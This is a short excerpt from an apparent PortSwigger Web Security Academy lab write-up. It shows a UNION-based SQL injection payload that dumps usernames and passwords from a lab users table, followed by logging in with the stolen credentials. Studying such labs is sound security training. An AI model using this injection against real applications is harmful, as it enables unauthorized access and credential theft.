HarshilBhuva/portswigger-websecurity-academy/01-sqli/SQL_injection_attack,_listing_the_database_contents_on_non-Oracle_databases/README.md

 Now we have all information to obtain the required usernames and passwords.
 Inject `' UNION SELECT username_spivdg, password_dfxmeh from users_kcstmf--` to form this query:

+// Replace the username and password field names according to the ones you noted above.

 ```sql
 SELECT * FROM someTable WHERE category='X' UNION SELECT username_spivdg, password_dfxmeh from users_kcstmf--'`
 ```

 ![usernames and passwords](img/username_and_passwords.png)

+// Passwords of users should be now visible.

 Now I simply log in to solve this exercise.